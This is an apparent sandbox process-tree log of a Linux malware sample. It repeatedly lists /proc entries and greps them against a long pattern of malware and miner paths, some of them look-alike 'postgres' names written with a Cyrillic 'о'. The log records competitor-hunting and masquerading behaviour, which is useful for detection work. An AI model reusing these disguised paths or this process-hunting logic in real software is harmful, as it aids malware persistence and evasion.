/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:844
-
-
/bin/grepgrep exe2⤵PID:847
-
-
/bin/lsls -latrh /proc/212⤵PID:846
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:849
-
-
/bin/grepgrep exe2⤵PID:852
-
-
/bin/lsls -latrh /proc/222⤵PID:851
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:854
-
-
/bin/lsls -latrh /proc/232⤵
- Reads runtime system information
PID:856
-
-
/bin/grepgrep exe2⤵PID:857
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:859
-
-
/bin/grepgrep exe2⤵PID:862
-
-
/bin/lsls -latrh /proc/242⤵PID:861
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:864
-
-
/bin/grepgrep exe2⤵PID:867
-
-
/bin/lsls -latrh /proc/2402⤵PID:866
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:869
-
-
/bin/grepgrep exe2⤵PID:872
-
-
/bin/lsls -latrh /proc/32⤵PID:871
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:874
-
-
/bin/grepgrep exe2⤵PID:877
-
-
/bin/lsls -latrh /proc/3272⤵PID:876
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:879
-
-
/bin/grepgrep exe2⤵PID:882
-
-
/bin/lsls -latrh /proc/3532⤵PID:881
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:884
-
-
/bin/grepgrep exe2⤵PID:887
-
-
/bin/lsls -latrh /proc/3542⤵PID:886
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:889
-
-
/bin/grepgrep exe2⤵PID:892
-
-
/bin/lsls -latrh /proc/3562⤵PID:891
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:894
-
-
/bin/lsls -latrh /proc/3572⤵PID:896
-
-
/bin/grepgrep exe2⤵PID:897
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:899
-
-
/bin/lsls -latrh /proc/362⤵PID:901
-
-
/bin/grepgrep exe2⤵PID:902
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:904
-
-
/bin/lsls -latrh /proc/372⤵PID:906
-
-
/bin/grepgrep exe2⤵PID:907
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:909
-
-
/bin/grepgrep exe2⤵PID:912
-
-
/bin/lsls -latrh /proc/3792⤵PID:911
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:914
-
-
/bin/grepgrep exe2⤵PID:919
-
-
/bin/lsls -latrh /proc/3802⤵PID:918
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:921
-
-
/bin/lsls -latrh /proc/3862⤵PID:924
-
-
/bin/grepgrep exe2⤵PID:925
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:928
-
-
/bin/grepgrep exe2⤵PID:931
-
-
/bin/lsls -latrh /proc/42⤵PID:930
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:934
-
-
/bin/grepgrep exe2⤵PID:938
-
-
/bin/lsls -latrh /proc/4342⤵PID:937
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:940
-
-
/bin/lsls -latrh /proc/52⤵PID:943
-
-
/bin/grepgrep exe2⤵PID:944
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:947
-
-
/bin/grepgrep exe2⤵PID:951
-
-
/bin/lsls -latrh /proc/62⤵PID:950
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:954
-
-
/bin/lsls -latrh /proc/6732⤵PID:956
-
-
/bin/grepgrep exe2⤵PID:957
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:960
-
-
/bin/grepgrep exe2⤵PID:964
-
-
/bin/lsls -latrh /proc/6752⤵PID:963
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:966
-
-
/bin/grepgrep exe2⤵PID:970
-
-
/bin/lsls -latrh /proc/6782⤵PID:969
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:973
-
-
/bin/grepgrep exe2⤵PID:976
-
-
/bin/lsls -latrh /proc/6792⤵PID:975
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:980
-
-
/bin/grepgrep exe2⤵PID:983
-
-
/bin/lsls -latrh /proc/6932⤵PID:982
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:986
-
-
/bin/grepgrep exe2⤵PID:990
-
-
/bin/lsls -latrh /proc/72⤵PID:989
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:992
-
-
/bin/grepgrep exe2⤵PID:996
-
-
/bin/lsls -latrh /proc/702⤵PID:995
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:999
-
-
/bin/lsls -latrh /proc/7072⤵PID:1001
-
-
/bin/grepgrep exe2⤵PID:1002
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1005
-
-
/bin/grepgrep exe2⤵PID:1009
-
-
/bin/lsls -latrh /proc/7082⤵PID:1008
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1012
-
-
/bin/grepgrep exe2⤵PID:1016
-
-
/bin/lsls -latrh /proc/712⤵PID:1015
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1018
-
-
/bin/grepgrep exe2⤵PID:1022
-
-
/bin/lsls -latrh /proc/7122⤵PID:1021
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1025
-
-
/bin/grepgrep exe2⤵PID:1028
-
-
/bin/lsls -latrh /proc/7132⤵PID:1027
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1032
-
-
/bin/grepgrep exe2⤵PID:1035
-
-
/bin/lsls -latrh /proc/7142⤵PID:1034
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1038
-
-
/bin/grepgrep exe2⤵PID:1042
-
-
/bin/lsls -latrh /proc/7152⤵PID:1041
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1046
-
-
/bin/grepgrep exe2⤵PID:1049
-
-
/bin/lsls -latrh /proc/7182⤵PID:1048
-
-
